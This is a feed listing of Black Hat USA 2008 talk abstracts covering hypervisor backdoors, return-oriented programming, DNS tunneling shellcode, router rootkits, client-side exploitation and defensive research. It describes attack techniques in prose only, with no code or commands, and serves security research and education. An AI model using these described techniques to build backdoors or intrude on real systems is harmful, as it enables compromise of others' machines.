Black Hat USA 2008 Hi-res .m4v Feed

Black Hat USA 2008: Mike Zusman - Leveraging the Edge: Abusing SSL VPNs

feedback@blackhat.com — Mon, 16 Mar 2009 20:13:53 -0700

Internet-facing SSL VPNs and Open Reverse Proxies can be abused to perform reconnaissance, data extraction, or general mischief INSIDE the Corporate Intranet and on SSL VPN clients. Such security devices are usually thought to add security to the enterprise network, while increased client side attack surface from required mobile code (ActiveX/Java) goes ignored.

This presentation will discuss programming and infrastructure flaws permitting abuse of the server, remote code execution on vulnerable clients, as well as appropriate countermeasures.

Black Hat USA 2008: Rafal Wojtczuk - Subverting the Xen Hypervisor

feedback@blackhat.com — Mon, 16 Mar 2009 20:10:14 -0700

Bluepill and Vitriol are well-known projects that install a malicious hypervisor in run-time. Can one achieve the same stealth backdoor functionality when a legal hypervisor is already present, by modifying its code? Such attempt would face at least the following difficulties:

a) the hypervisor may protect itself against modification in runtime

b) it may be nontrivial to integrate foreign code with the hypervisor

This presentation will demonstrate how to subvert Xen hypervisor (on 32bit x86 platform) to gain backdoor functionality. The following topics will be covered:

a) brief overview of Xen architecture

b) practical ways to stealthly use DMA to control all physical memory

c) Xen loadable backdoor modules framework - description of a set of tools allowing to easily load compiled C code into Xen hypervisor (similarly to how Linux kernel modules work)

d) implementation of a backdoor residing in hypervisor space (so, invisible from the hosted operating system), allowing for remote commands execution

e) implementation of a backdoor residing in a hidden, unprivileged domain, allowing for remote commands execution in dom0

The code implementing the above will be demonstrated.

Attendees should know the basics of virtualization technologies and Linux kernel internals.

This presentation is the first one in the series of the three talks about Xen (in)security presented by Invisible Things Lab at this year’s Black Hat, collectively referred as “Xen 0wning trilogy”. The remaining talks are: “Detecting and Preventing the Xen hypervisor subversions” and “Bluepilling the Xen hypervisor”.

Black Hat USA 2008: Fyodor Vaskovich - Nmap: Scanning the Internet

feedback@blackhat.com — Mon, 16 Mar 2009 20:07:14 -0700

The Nmap Security Scanner was built to efficiently scan large networks, but Nmap's author Fyodor has taken this to a new level by scanning millions of Internet hosts as part of the Worldscan project.

He will present the most interesting findings and empirical statistics from these scans, along with practical advice for improving your own scan performance. Additional topics include detecting and subverting firewall and intrusion detection systems, dealing with quirky network configurations, and advanced host discovery and port scanning techniques. A quick overview of new Nmap features will also be provided.

Black Hat USA 2008: Jeroen van Beek - ePassports Reloaded

feedback@blackhat.com — Mon, 16 Mar 2009 20:03:59 -0700

In 2006, BlackHat Las Vegas presented a cloned ePassport. In 2008, the rumor goes that Elvis is still alive or at least his passport is. This presentation will examine the different mechanisms used in ePassport to prevent cloning and creation of electronic travel documents with non-original content and ways to attack these mechanisms.

Black Hat USA 2008: Christopher Tarnovsky - Inducing Momentary Faults Within Secure Smartcards / Microcontrollers

feedback@blackhat.com — Mon, 16 Mar 2009 20:00:18 -0700

This presentation is intended for individuals with an understanding of the Intel 8051 and Motorola 6805 processor families from an Assembly language perspective. This will be an interactive presentation with the audience.

Log files will be examined that have been taken from the targets (smartcards) at every clock cycle of the CPU during its runtime. We will discuss our possibilities and determine points in time (clock cycle periods) to momentarily induce a fault within the target.

Our goal will be to override the normal behavior of the target for our own use such as

* Temporary changes- Readout of normally private records from the device
* Permanent changes- Change non-volatile memory to create a back-door or completely rewrite behavior model

Both smartcards contain a Cryptographic co-processor and are known to have been used to secure Data, PCs, laptops and Sun-Ray terminals.

Black Hat USA 2008: Bryan Sullivan - REST for the Wicked

feedback@blackhat.com — Mon, 16 Mar 2009 19:57:17 -0700

Let's face it: SOAP sucks. Especially when it comes to Web 2.0 applications. Many high-profile web sites have come to this same conclusion: Amazon, MySpace, Yahoo, and others are abandoning SOAP in favor of REST. REST (Representational State Transfer), and particularly REST used in combination with JSON, is faster, more scalable, and easier to implement than SOAP. But, do all these benefits come at the cost of security?
REST can be especially susceptible to attacks like Cross-Site Request Forgery and JavaScript Hijacking; and worse, the usual remediation tactics that developers use to defend their apps against these attacks do not apply to REST services. In this presentation, I will demonstrate threats facing RESTful web services, myth-bust commonly proposed defense techniques, and provide appropriate development practices for defending REST.

Black Hat USA 2008: Matthieu Suiche - Windows Hibernation File for Fun and Profit.

feedback@blackhat.com — Mon, 16 Mar 2009 19:54:40 -0700

This presentation aims to describe Windows hibernation file format and his modification since Windows 2000. Hibernation provides an official way to dump the physical memory into a specific file called hiberfil.sys. This last one is fully undocumented and until now there is no documentation about it.

Black Hat USA 2008:Tom Stracener - Xploiting Google Gadgets: Gmalware and Beyond

feedback@blackhat.com — Mon, 16 Mar 2009 19:51:02 -0700

Google Gadgets are symptomatic of the Way 2.0 Way of things: from lame gadgets that rotate through pictures of puppies to calendars, and inline email on your iGoogle homepage. This talk will analyze the security history of Google Gadgets and demonstrate ways to exploit Gadgets for nefarious purposes. We will also show ways to create Gadgets that allow you to port scan internal systems and do various javascript hacks via malicious (or useful) gadgets, depending on your point of view. We've already ported various javascript attack utilities to Google Gadgets (like PDP's javascript port scanner) among other things. We will also disclose a zero day vulnerability in Google Gadgets that makes Gmalware (Gmodules based malware) a significant threat. This talk will be given by Robert Hansen (Rsnake) and Tom Stracener (Strace)

Black Hat USA 2008: Joe Stewart - Protocols and Encryption of The Storm Botnet

feedback@blackhat.com — Mon, 16 Mar 2009 19:44:23 -0700

This talk will provide an in-depth, detailed explanation of how the network and encryption protocols of the Storm botnet work together to create a massive and resilient peer-to-peer network capable of sending billions of spams per day.

Black Hat USA 2008: Scott Stender - Concurrency Attacks in Web Applications

feedback@blackhat.com — Mon, 16 Mar 2009 19:41:22 -0700

Modern web application frameworks are designed for developer productivity and performance. They are highly scalable, object-oriented, and can be used to create a usable web site in a matter of minutes.

Highly parallelized, object-oriented web application frameworks encourage programming practices that make managing state difficult for a typical programmer. In order to have a web application that is robust in a multi-threaded environment, the developer must carefully manage access to all resources that can shared by threads. Global variables, session variables, database access, and back-end systems are common examples of such resources, not to mention application-specific resources.

Concurrency flaws result when security-sensitive resources are not managed properly. As we have seen with almost every other prevalent class of security flaws, mistakes happen often when doing the right thing is difficult. To make things worse, concurrency flaws are often subtle and are identified only through difficult targeted testing.

This presentation will provide deep technical background against this class of flaw, enumerate testing techniques that help identify when flaws are present, and demonstrate tools that automate the process.

Black Hat USA 2008: Jonathan Squire - A Fox in the Hen House (UPnP IGD)

feedback@blackhat.com — Mon, 16 Mar 2009 19:38:23 -0700

Easy is the mantra of consumer devices these days. “Just plug it in and it works. No configuration needed.” All this simplicity hopefully causes one to pause and wonder, how is this possible?

This presentation will demonstrate the dangers of the often overlooked Universal Plug and Play (UPnP) Internet Gateway Device (IGD) profile. UPnP IGD is commonly enabled on modern home cable modem/wireless routers. UPnP IGD allows applications such as games and chat clients to request needed port forwards without the user’s intervention. Many of these routers do not even display these port mappings in their administrative interfaces.

In this presentation we will walk the audience through the simple steps needed to modify the port mappings on a common wireless router and discuss some of the potential attacks that can be performed. Sample code will be demonstrated that dynamically adds and removes port forwarding rules from the router to expose internal services to the internet. This simple attack is performed without any need for authentication and the new forwarding rules generally aren’t visible in the web interface of the router.

Black Hat USA 2008: Sherri Sparks, Shawn Embleton - Deeper Door - Exploiting the NIC Chipset

feedback@blackhat.com — Mon, 16 Mar 2009 19:34:22 -0700

In this presentation we will discuss a couple of significant problems in existing IDS / Firewall technology and present a proof of concept "chipset" level rootkit / network backdoor that is capable of bypassing virtually all host based firewall and intrusion detection software on the market. These, of course, include popular, widely deployed software like Snort and Zone Alarm Security Suite. Our backdoor operates at an even deeper level than previous backdoors (e.g. Joanna's "DeepDoor" rootkit) because it interacts directly with the chipset interface of the NIC hardware. Capabilities include the ability to both covertly send AND recieve packets. We use both of these capabilities to implement a simple command and control interface. Implications for security vendors include the exfiltration of sensitive information and delayed detection of malware threats like DDOS attacks, Botnets, and Worms.

Black Hat USA 2008: Alexander Sotirov, Mark Dowd - How To Impress Girls With Browser Memory Protection Bypasses

feedback@blackhat.com — Mon, 16 Mar 2009 19:29:42 -0700

Over the past several years, Microsoft has implemented a number of memory protection mechanisms with the goal of preventing the reliable exploitation of common software vulnerabilities on the Windows platform. Protection mechanisms such as GS, SafeSEH, DEP and ASLR complicate the exploitation of many memory corruption vulnerabilities and at first sight present an insurmountable obstacle for exploit developers.

This talk aims to present exploitation methodologies against this increasingly complex target. We will demonstrate how the inherent design limitations of the protection mechanisms in Windows Vista make them ineffective for preventing the exploitation of memory corruption vulnerabilities in browsers and other client applications.

Each of the aforementioned protections will be briefly introduced and its design limitations will be discussed. We will present a variety of techniques that can be used to bypass the protections and achieve reliable remote code execution in many different circumstances. Finally, we will discuss what Microsoft can do to increase the effectiveness of the memory protections at the expense of annoying Vista users even more.

Black Hat USA 2008: Val Smith, Colin Ames - Meta-Post Exploitation

feedback@blackhat.com — Mon, 16 Mar 2009 19:26:14 -0700

When penetration testing large environments, testers require the ability to maintain persistent access to systems they have exploited, leverage trusts to access other systems, and increase their foothold into the target. Post exploitation activities are some of the most labor intensive aspects of pen testing. These include password management, persistant host access, priviledge escalation, trust relationships, aquiring GUI access, etc. Penetration testers acquire hashes, crack them, keep track of which passwords go with which usernames / systems and finally reuse this information to penetrate further systems.

This paper will first cover the technical details of these topics as well as some examples of manual methods currently in use during penetration tests. Next we will present some improvements to these techniques and demonstrate some tools we have developed which can be integrated with other popular applications such as Metasploit. We will also demonstrate automated methods for using collected password intelligence to penetrate massive numbers of systems. Finally we will suggest some future directions for this area.

Black Hat USA 2008: Mark Shelhart - Meet The Owner Of a Real Hacked Company - Forensic Investigation

feedback@blackhat.com — Mon, 16 Mar 2009 19:22:54 -0700

Jimmy owns a restaurant that was compromised by credit card hackers. Hear his story told by Jimmy, as well as the forensic investigator that worked the case.

We will cover details of what the attacker specifically did, along with EnCase screenshots. We will also let Jimmy talk about what this meant to him, his family, and his business.

Black Hat USA 2008: Hovav Shacham - Return-Oriented Programming: Exploits Without Code Injection

feedback@blackhat.com — Mon, 16 Mar 2009 19:16:41 -0700

We describe return-oriented programming, a generalization of return-into-libc that allows an attacker to undertake arbitrary, Turing-complete computation without injecting code.

New computations are constructed by linking together code snippets that end with a "ret" instruction. The ret instructions allow an attacker who controls the stack to chain instruction sequences together. Because the executed code is stored in memory marked executable, W^X and DEP will not prevent it from running.

W^X and DEP, along with many other ecurity systems, make the assumption that preventing the introduction of malicious code is sufficient to prevent the introduction of malcious computation. With the return-oriented computing approach, this assumption is false: subverting control flow on the stack is sufficient to construct arbitrary computation from "known-good" code.

On the x86 one can obtain useful instruction sequences by jumping into the middle of intended instructions, but return-oriented programming is possible even on RISC platforms that are very different from the x86.

Black Hat USA 2008: Alexander Tereshkin, Joanna Rutkowska - Bluepilling the Xen Hypervisor

feedback@blackhat.com — Mon, 16 Mar 2009 19:13:46 -0700

We discuss how to insert Bluepill on top of the running Xen hypervisor (x64). We will show how to do that both with and without restart (i.e. on the fly). To make this possible, our Bluepill needs to support full nested virtualization, so that Xen can still function properly. We will also discuss how the “Bluepill detection” methods proposed over the last 2 years, as well as the integrity scanning methods discussed in the previous speech, fit into this new scenario and how far we are from the stealth malware’s Holy Grail ;)

This presentation is the last one in the series of the three talks about Xen (in)security presented by Invisible Things Lab at this year’s Black Hat, collectively referred as “Xen 0wning trilogy”. It’s recommended for the audience to attend the “Subverting the Xen hypervisor” and “Detecting and Preventing the Xen hypervisor subversions” presentations before coming to this talks.

Black Hat USA 2008: Joanna Rutkowska, Rafal Wojtczuk - Detecting & Preventing the Xen Hypervisor Subversions

feedback@blackhat.com — Mon, 16 Mar 2009 19:10:19 -0700

We discuss various anti-subverting techniques (IOMMU/VT-d, Xen’s driver- and stub- domains, etc) and whether they really can protect the Xen (or similar) hypervisor from compromises. After demonstrating that those mechanisms can be bypassed, we will switch to discussing hypervisor integrity scanning and will present some prototype solutions to this problem.

This presentation is the second one in the series of the three talks about Xen (in)security presented by Invisible Things Lab at this year’s Black Hat, collectively referred as “Xen 0wning trilogy”. It’s recommended for the audience to attend the “Subverting the Xen hypervisor” presentation before coming to this talk. The follow up presentation is entitled: “Bluepilling the Xen hypervisor”.

Black Hat USA 2008: Paul Royal - Alternative Medicine: The Malware Analyst's Blue Pill

feedback@blackhat.com — Mon, 16 Mar 2009 19:06:55 -0700

Modern malware contains a myriad of anti-debugging, anti-instrumentation, and anti-VM techniques that pose challenges to security professionals who want to understand an instance’s malicious runtime behavior. Static analysis of malware can be similarly stymied by code obfuscations created using custom or best-of packers, and execution-based unpacking must deal with the same challenges as those focusing on runtime behavior. Robust tracing programs and automated deobfuscation tools help the analysis process, but given that nearly all of these approaches reside in or emulate part of the guest OS, the result is a fast-moving, ever-escalating detection/detection-prevention arms race.

In an effort to evolve the nature of the obfuscation/deobfuscation game played between malware authors and security practitioners, this presentation will discuss the design and implementation of completely external malware analysis approaches that operate through the use of hardware virtualization extensions (e.g., Intel’s VT). To motivate their need, highlights of detection attacks for existing in-guest or emulation-based approaches will also be presented.

In addition to showing how virtualization extensions can be carefully leveraged to create tracing and instrumentation techniques, construction of and source code for a (KVM-based) simple prototype allowing for fine-grained tracing and instrumentation will be provided. Test cases showing that the prototype prevents a malware instance from inferring that it is being spied upon or that the environment is not baremetal will also be presented.

Black Hat USA 2008: Ivan Ristic, Ofer Shezaf - No More Signatures: Defending Web Applications from 0-Day Attacks with ModProfiler UsingTraffic Profiling

feedback@blackhat.com — Mon, 16 Mar 2009 19:04:07 -0700

Web application security is a big problem, yet there is never enough time to dedicate to solving the issue or, at least, making it smaller. To help with this, we embarked on a project that would enable you to tighten the security of your web applications with little effort. The project, called ModProfiler, aims to provide best-possible protection for web applications by analysing web application traffic passing by. This new open source tool builds on the success of ModSecurity (also open source), which is generally considered to be the most widely deployed web application firewall.

The premise is simple: ModProfiler works by observing what's valid and what's not, resulting with a tight application shield designed around the positive security model concept. The process of shield construction is not as simple, but the complexity is hidden away. This talk, presented by Ivan Ristic and Ofer Shezaf, the authors of the tool, will give you an insight into the technology behind the scenes, and enable you to get the most out of it.

Black Hat USA 2008: Mike Reavey, Steve Adegbite, Katie Moussouris - Secure the Planet! New Strategic Initiatives from Microsoft to Rock Your World

feedback@blackhat.com — Mon, 16 Mar 2009 19:00:27 -0700

Has Microsoft lost its mind??!! Yes and no! Three top security dudes (one technically being a dudette) at Microsoft have come up with three new programs that will change the face of the vulnerability industry.

Black Hat USA 2008: Danny Quist - Temporal Reverse Engineering

feedback@blackhat.com — Mon, 16 Mar 2009 18:50:10 -0700

Reverse engineering a program requires considerable patience and skill. The amount of information that has to be analyzed can be overwhelming, and often times the relevant portions of code represent a very small part of the overall program. One of the most effective methods for reverse engineering a program is to analyze the changes in memory state. This provides a fine grained view of execution, intent, and functionality. To analyze changes of state correctly you have to use a combination of static and dynamic methods. We will present our work on the use of process checkpointing as a means to track the changes in program state. Visualization changing process state can be used to reduce the amount of time necessary to analyze a program. As a demonstration we will analyze information protection systems, a known piece of malware, the Storm worm and a benign application.

Black Hat USA 2008: Bruce Potter - Malware Detection Through Network Flow Analysis

feedback@blackhat.com — Mon, 16 Mar 2009 18:46:59 -0700

Over the last several years, we've seen a decrease in effectiveness of "classical" security tools. The nature of the present day attacks is very different from what the security community has been used to in the past. Rather than wide-spread worms and viruses that cause general havoc, attackers are directly targeting their victims in order to achieve monetary or military gain. These attacks are blowing right past firewalls and anti-virus and placing malware deep in the enterprise. Ideally, we could fix this problem at its roots; fixing the software that is making us vulnerable. Unfortunately that's going to take a while, and in the interim security engineers and operators need new, advanced tools that allow deeper visibility into systems and networks while being easy and efficient to use.

This talk will focus on using network flows to detect advanced malware. Network flows, made popular by Cisco's NetFlow implementation available on almost all their routers, has been used for years for network engineering purposes. And while there has been some capability for security analysis against these flows, there has been little interest until recently. This talk will describe NetFlow and how to implement it in your network. It will also examine advanced statistical analysis techniques that make finding malware and attackers easier. I will release a new version of Psyche, an open source flow analysis tool, and show specific examples of how to detect malware on live networks.

Black Hat USA 2008: Petko D. Petkov - Client-Side Security

feedback@blackhat.com — Mon, 16 Mar 2009 18:42:39 -0700

Client-side software generally refers to a class of computer programs that are executed on the client, by the user's supporting environment, instead of the server. Both, clients and servers are in constant interaction. In a Web environment, the client is represented by the user's web browser, while the server is the remote computer, which serves dynamic content. In a much broader context, the client-server relationship can be represented by a network client connected to a WiFi network.

This paper describes numerous techniques for attacking Clients-side technologies. The content of the paper is based on the research that has been conducted over the past year by the GNUCITIZEN Ethical Hacker Outfit.

If Apple responds before the event, I will drop the details of a QuickTime 0day for Windows Vista and XP.

Black Hat USA 2008: Steve Pate - Playing by Virtual Security Rules: How Virtualization Changes Everything and What to Do about It

feedback@blackhat.com — Mon, 16 Mar 2009 18:39:50 -0700

Virtualization completely changes the risk to information theft. Traditional physical security systems become ineffective, disk encryption no longer protects the operating system, and sensitive data becomes more portable than ever before. This talk will cover the security risks of virtualized environments, common hacking techniques, how virtualization effects traditional security practices, and presents a new model for securing virtualized environments.

Black Hat USA 2008: Michael Ossmann - Software Radio and the Future of Wireless Security

feedback@blackhat.com — Mon, 16 Mar 2009 17:58:02 -0700

Radios are everywhere. We use them daily in car stereos, cordless phones, car key fobs, proximity access cards, laptops, television tuners, garage door openers, mobile phones, and headsets, to name a few. To build one of these radio devices in the traditional manner, you would need some electronic components (including, in many cases, a microprocessor), a soldering iron, and a fairly advanced knowledge of electronic circuit design. All that is changing, however, with the emergence of software radio. The digital technologies that revolutionized the audio world over last thirty years are now bringing the same revolution to the radio world. General purpose computers are becoming fast enough to function as sophisticated radio devices with minimal hardware peripherals. In the future, all radios will be software radios, and all practical wireless security tools will be implemented with software radio.

This presentation will describe the state of software radio, discuss future trends, and point out current and future applications of software radio technologies to wireless security research. Particular attention will be given to tools and resources that are available today, helping attendees without a background in RF technology to get started in the field. Practical attacks will be demonstrated using GNU Radio and the Universal Software Radio Peripheral.

Black Hat USA 2008: OlleB - Mobitex Network Security

feedback@blackhat.com — Mon, 16 Mar 2009 17:55:21 -0700

This talk will give an overview of the Mobitex wireless networking technology and infrastructure (www.mobitex.org). A detailed presentation of the authentication (subscriber identity) and privacy (anti-sniffing) features will be presented and fundamental weaknesses in both will be presented along with suggested improvements and "best practice" advice for implementors of applications built on Mobitex and other wide-area coverage wireless network standards.

Black Hat USA 2008: Justine Osborne, Alex Stamos - Living in the RIA World: Blurring the Line Between Web and Desktop Security

feedback@blackhat.com — Mon, 16 Mar 2009 17:52:07 -0700

Rich Internet Applications (RIA) represent the next generation of the Web. Designed to run without constant Internet connectivity, they provide a graphical experience equivalent to thick desktop applications with the easy install experience of thin Web apps. They intentionally blur the line between websites and traditional desktop applications and greatly complicate the jobs of web developers, corporate security teams, and external security professionals.

Our goal with this talk will be to outline the different attack scenarios that exist in the RIA world and to provide a comparison between the security models of the leading RIA platforms. We will discuss how current attacks against web applications are changed with RIA as well as outline new types of vulnerabilities that are unique to this paradigm. Attendees will learn how to analyze the threat posed to them by RIA applications as either providers or consumers of software built on these new platforms.

We will also be discussing the attack surface exposed by the large media codec stacks contained in each of these platforms. Our targeted platforms include Adobe AIR, Microsoft Silverlight, Google Gears, JavaFX, and Mozilla Prism. At this talk, we will be releasing tools for testing the codec security of these platforms as well as sample malicious code demonstrating the danger of RIA applications.

Black Hat USA 2008: Karsten Nohl - Mifare -- Little Security, Despite Obscurity

feedback@blackhat.com — Mon, 16 Mar 2009 17:48:04 -0700

Radio Frequency Identification (RFID) tags are becoming ubiquitous and can already be found in touch-less entry systems, all major credit cards, most car keys, and many ticketing systems. Mifare are the most widely deployed brand of cryptographic RFID tags and their security relies on proprietary security, in spite of the well known fact that security-through-obscurity does not work.
We find the secret algorithms from Mifare tags by using a combination of image analysis of circuits and protocol analysis. In this process, we open silicon chips, take pictures under a microscope, employ and adapt computer vision algorithms, design and build radio equipment, simulate circuits, and finally use cryptanalysis to assess the security of the discovered algorithms. Our project is the first non-classified work to provide a methodology for hardware reverse-engineering and corrects the belief that this process is necessarily expensive.
Our analysis of the widely used Mifare RFID tags reveals that its actual security is well below the claimed security level due to a number of design flaws. The security of the analyzed tag is clearly insufficient for many of its applications. Consequently, ever since news of our results first surfaced, several current deployments of the tags have been brought under public scrutiny. Most notably, a nationwide ticket system for public transport in the Netherlands must now be re-engineered. During a parliamentary discussion on this subject, politicians have called for proprietary technology to be avoided in favor of open designs.

Black Hat USA 2008: Junichi Murakami -A Hypervisor IPS based on Hardware Assisted Virtualization Technology

feedback@blackhat.com — Mon, 16 Mar 2009 17:35:57 -0700

Recently malware has become more stealthy and thus harder to detect, than ever before. Current malware uses many stealth techniques, such as dynamic code injection, rootkit technology and much more. Moreover, we have seen full kernel mode malware like Trojan.Srizbi.

Many detection tools were released that specialize in kernel mode malware and especially in the detection of rootkits. However, these tools are a cat and mouse game, because they and the malware are executed on the same privilege level.

This is why we developed an IPS based on a hypervisor, which uses features of hardware virtualization. It is executed on Ring-1 and thus runs with higher privileges than the OS layer.

In this session, we will talk about stealth mechanisms used by recent malware and demonstrate how to protect against such malware using Hypervisor IPS.

Black Hat USA 2008: Ariel Futoransky - Viral Infections in Cisco IOS

feedback@blackhat.com — Mon, 16 Mar 2009 17:30:10 -0700

Rootkits are very common in most popular Operating Systems like Windows, Linux, Unix and any variant of those but they are rarely seen in embedded OS's.

This is due to the fact that most of the time embedded OS's are closed source, hence internals of the OS are unknown and reverse engineering process is harder than usual. In real life, it's very common that once an attacker takes control of a system he or she needs to maintain access to it so a rootkit is installed.

The rootkit seizes control of the entire system running on that hardware by hiding files, processes, network connections, allowing unauthorized users to act as system administrators, etc..

This paper demonstrates that a rootkit with those characteristics can be easily created and deployed for a closed source OS like IOS and run unnoticed by system administrators by surviving to most, if not all, of the security measures given by experts on the field.

As a proof of this, different ways to infect a target IOS will be shown like run-time patching and image binary patching. To discuss the binary patching technique from a practical point of view, a set of python scripts that provides a the methods to insert a generic rootkit implementation called DIK (Da Ios rootKit) will be introduced and it's done in plain C for IOS. Also other techniques like run-time image infection will be discussed in detail.

Black Hat USA 2008: Shawn Moyer and Nathan Hamiel - Satan is on My Friends List: Attacking Social Networks

feedback@blackhat.com — Mon, 16 Mar 2009 17:25:49 -0700

Social Networking is shaping up to be the perfect storm An implicit trust of those in ones network or social circle, a willingness to share information, little or no validation of identity, the ability to run arbitrary code (in the case of user-created apps) with minimal review, and a tag soup of client-side user-generated HTML. Yikes.

But enough about pwning the kid from homeroom who copied your calc homework. With the rise of business social networking sites, there are now thousands of public profiles with real names and titles of people working for major banks, the defense and aerospace industry, federal agencies, the US Senate... A target-rich and trusting environment for custom-tailored, laser-focused attacks.

Black Hat USA 2008: Ty Miller - Reverse DNS Tunneling Shellcode

feebcak@blackhat.com — Mon, 16 Mar 2009 17:20:20 -0700

Remote exploitation of client-side vulnerabilities are falling short due to the shellcode often failing to connect back to the attacker. The creation of "Reverse DNS Tunneling Shellcode" will allow client-side exploits to be much more effective by using DNS as a tunneling protocol. This increases the success rate of client-side exploitation attempts by using this more stable tunneling technique.

The number of vulnerabilities found within external systems and services are decreasing making it less likely to directly exploit externally accessible systems to gain access to an internal network. Thankfully for Hackers and Penetration Testers client-side vulnerabilities are still rampant, such as in web browsers, plugins, local software and operating systems. This has increased interest in creating and using exploits for client-side vulnerabilities. It is quite common for an exploit to be successful, however, still fail to connect back to the attacker due to firewalls preventing direct outbound connections, HTTP tunneling failing to detect, connect or authenticate out via proxies, or complexities in hijacking established connections, if they exist.

Reverse DNS Tunneling shellcode is a new technique for shellcode that increases the success rate of client-side exploit attempts by using the DNS protocol. DNS provides a number of advantages over other protocols. Most remote exploitation attempts of client-side vulnerabilities aim to attack workstations. Workstations are almost always pre-configured to use an internal DNS server, which we can use to tunnel our connection out. DNS also does not require authentication, where as HTTP tunneling does, which means that DNS has fewer barriers to bypass in order to escape the internal network. This is important since it means that the chance of successful exploitation is much higher when using Reverse DNS Tunneling Shellcode.

Black Hat USA 2008: Meet the Feds

feedback@blackhat.com — Mon, 16 Mar 2009 17:04:52 -0700

Join some of the longest running cybercops in a reality session not made for TV. Hang out on the front lines to learn about the most sophisticated attacks happening so far this year. We don't expect to win an Emmy, but we might get a Pwnie. This year we will have so many feds representing their federal agencies that we will break it up into two separate panels an hour each:

IA Panel: Information assurance, CERTS, first responder’s organizations from agencies

LE Panel: Law enforcement, counterintelligence agencies

Each of the agency reps make an opening statement regarding their agencies role, then open it up to the audience for questions. Agencies that will have representatives include: Defense Cyber Crime Center (DC3), FBI, IRS, NCIS, NASA, DHS USCERT, DoJ, National White Collar Crime Center (NWC3), NSA, US Postal IG, Office of the Secretary of Defense, National Defense University.

Black Hat USA 2008: Haroon Meer - Pushing the Camel through the Eye of a Needle

feedback@blackhat.com — Mon, 16 Mar 2009 17:00:14 -0700

In 2007 SensePost demonstrated the how DNS and Timing attacks could be used for a variety of attacks. This year we take those attacks further and show how small footholds in a target network can be converted into portals we can (and do) drive trucks through! With some updated SensePost tools, and some brand new ones, we will demonstrate how to convert your simple SQL Injection attacks (against well hardened environments) into point and click (well, type and click) ownage, how the framework management pages you never knew you had, can double as our network proxies and why despite all of the hype around SQL Server 2005, we still enjoy finding it behind vulnerable web applications. The talk is fairly technical and expects that the attendees understand the basics of Web Application and Web Browser based attacks. Attendees will leave with new attack vectors, a couple of new tools and some thoughts on future directions of these attacks.

Black Hat USA 2008: Patrick McGregor - Braving the Cold: New Methods for Preventing Cold Boot Attacks on Encryption Keys

feedback@blackhat.com — Mon, 16 Mar 2009 16:57:11 -0700

We can prevent Cold Boot attacks. We present a new set of software-driven techniques for protecting cryptographic keys in various encryption systems. These software techniques do not involve the use of any specialized hardware or encryption chips. Instead, the techniques utilize specialized cryptographic transformations, memory system and operating system operations, and certain architectural features of general-purpose processors such as Pentiums. The methods can defend against Cold Boot attacks on machines that have been shut off, on machines in hibernate and sleep modes, and even on machines in screen lock mode.

Black Hat USA 2008: Nathan McFeters - The Internet is Broken: Beyond Document.Cookie - Extreme Client Side Exploitation

feedback@blackhat.com — Mon, 16 Mar 2009 16:54:05 -0700

The dangers of client-side threats such as XSS and CSRF are well understood in the context of vulnerable web applications. Furthermore, the dangers of malicious script as a vehicle for exploiting browsers flaws and reconnoitering the Intranet have been discussed at length. Now what if XSS and CSRF could be leveraged to directly to compromise the host… by design?

Rewind a few years ago and the client-side landscape was somewhat different: research was focused on exploiting the complex interactions between components exposed by the browser. The security of the whole was defined as the sum of the weaknesses of the parts, namely JavaScript, Java, Flash, and anything accessible via a protocol handler. These types of attack gave way to direct browser flaws... after all, why carry out a multi-stage attack when you could trigger straight code execution? Fast forward to 2008: browser flaws are not going away in the foreseeable future but they are on the decline, and in a world of stack cookies, non-executable stacks and ASLR they are becoming increasingly hard to exploit. Which takes us back to the complexity issues. They never went away. In fact the situation has gotten worse spurred by the development of offline solutions such as Google Gears and Adobe AIR, the plethora of protocol handlers and an explosion of browser helper objects.

This double session presentation combines the research of four notable Black Hat presenters who have previously discussed client side exploitation from browser to rootkit. This combined with a rapidly increasing corporate interest in "outsourcing" applications to the browsers, this fast paced, entertaining, and novel presentation answers the question: should we really be building next generation applications on the shaky foundations of the browser?

This is NOT another talk focused on XSS or CSRF, it's about issues and vulnerability classes that have not been discussed anywhere else. You get all of this from some legit, good looking security researchers, what more could you ask for?

Black Hat USA 2008: Felix Lindner - Developments in Cisco IOS Forensics

feedback@blackhat.com — Mon, 16 Mar 2009 16:50:32 -0700

Attacks on network infrastructure are not a new field. However, the increasing default protections in common operating systems, platforms and development environments increase interest in the less protected infrastructure sector. Today, performing in-depth crash analysis or digital forensics is almost impossible on the most widely used routing platform.

This talk will show new developments in this sector and how a slightly adjusted network infrastructure configuration together with new tools finally allows to separate crashed, attacked and backdoored routers from each other. We walk through the known types of backdoors and shellcodes for IOS as well as their detection and the challenges in doing so.

Black Hat USA 2008: Andrew Lindell - Bluetooth v2.1 - a New Security Infrastructure and New Vulnerabilities

feedback@blackhat.com — Mon, 16 Mar 2009 16:47:26 -0700

The Bluetooth protocol for close-range wireless communication has been a huge success. It is a widely adopted standard and is used for a wide range of devices, from cellphones to PDAs to laptops and more. Due to its ubiquity and importance, its security has become a critical issue. In the new version 2.1 released in July 2007, a complete overhaul of the pairing procedure was carried out with the express aim of making it more secure. In this paper we show that the Bluetooth pairing protocol in passkey entry mode completely leaks the password. In addition, we show that it is possible to pair with a device that uses a fixed (but unknown) password, even when the password is random and reasonably long. Our attacks demonstrate that passkey entry mode can only be used with a different random password each time. Unfortunately this is not possible for devices that use a fixed password (like many hands-free car kits). In addition, due to human behavior, this is unlikely to be the case when the user enters the password into two devices in order to pair them. Thus, devices who leave it to the user to enter a password (instead of randomly generating it on one of the devices) will be vulnerable to attack.

Black Hat USA 2008: Nate Lawson - Highway to Hell: Hacking Toll Systems

feedback@blackhat.com — Mon, 16 Mar 2009 16:43:55 -0700

Toll payment systems, such as FasTrak and E-ZPass, promise quick travel and more revenue for the state. While privacy issues with such systems have been discussed in general, little is known about their actual implementation and security. We reverse-engineered the RFID internals and analyzed the protocol to find out just what's going on inside. We'll explain the low-level details we found, problems, and possible ways to build a more safe and secure system

Black Hat USA 2008: Eric Laspe - Deobfuscator: an Automated Approach to the Identification and Removal of Code Obfuscation

feedback@blackhat.com — Mon, 16 Mar 2009 16:40:58 -0700

The Deobfuscator is an IDA Pro plug-in that neutralizes anti-disassembly code and transforms obfuscated code to simplified code in the actual binary. This plug-in uses emulation techniques to remove obfuscated code and replace it with a simplified, transformed equivalent. It can be used alone to modify an IDA Pro database for static analysis, or in conjunction with a binary injector to ease dynamic analysis.

We developed this tool in assessing strengths of protections and malware analysis for DoD government entities and commercial companies. Since its inception, the Deobfuscator has proven to reduce analysis tasks that previously took days into ones that take mere minutes.

Black Hat USA 2008: Zane Lackey and Luis Miras - Mobile Phone Messaging Anti-Forensics

feedback@blackhat.com — Mon, 16 Mar 2009 16:37:17 -0700

